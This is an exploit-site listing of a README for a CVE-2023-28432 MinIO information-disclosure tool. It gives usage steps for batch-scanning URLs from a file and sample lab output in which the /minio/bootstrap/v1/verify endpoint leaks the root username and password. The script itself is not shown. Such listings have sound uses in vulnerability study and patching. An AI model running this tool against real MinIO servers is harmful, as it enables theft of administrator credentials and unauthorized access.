Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Minio CVE-2023-28432

Name: Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Minio CVE-2023-28432
Rating: 5 (370 reviews)
2023-12-07 | CVSS 7.5
## https://sploitus.com/exploit?id=511A8A34-7218-5CB2-BE64-9907FF25C17C
# CVE-2023-28432

CVE-2023-28432 Minio Information isclosure Exploit

## Usage

+ 将`url`写入`urls.txt`，直接运行`python CVE-2023-28432.py `即可
+ 兼容格式：`http://ip:port`，`ip:port`

```powershell
python CVE-2023-28432.py 

     ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██████╗  █████╗ ██╗  ██╗██████╗ ██████╗ 
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ╚════██╗██╔══██╗██║  ██║╚════██╗╚════██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝╚█████╔╝███████║ █████╔╝ █████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝██╔═══╝ ██╔══██╗╚════██║ ╚═══██╗██╔═══╝ 
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝      ███████╗╚█████╔╝     ██║██████╔╝███████╗
     ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝       ╚══════╝ ╚════╝      ╚═╝╚═════╝ ╚══════╝
                                                                            
                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用，请勿用于其他用途                                                                                                          
    
2023-12-07 14:15:23.856 | INFO     | __main__:check_url:103 - Checking Url: http://127.0.0.1:9000/minio/bootstrap/v1/verify
2023-12-07 14:15:23.863 | SUCCESS  | __main__:send_request:126 - Root User: minioadmin
2023-12-07 14:15:23.863 | SUCCESS  | __main__:send_request:127 - Root Password: minioadmin-vulhub
2023-12-07 14:15:23.863 | INFO     | __main__:check_url:103 - Checking Url: http://127.0.0.1:9000/minio/bootstrap/v1/verify
2023-12-07 14:15:23.866 | SUCCESS  | __main__:send_request:126 - Root User: minioadmin
2023-12-07 14:15:23.866 | SUCCESS  | __main__:send_request:127 - Root Password: minioadmin-vulhub
```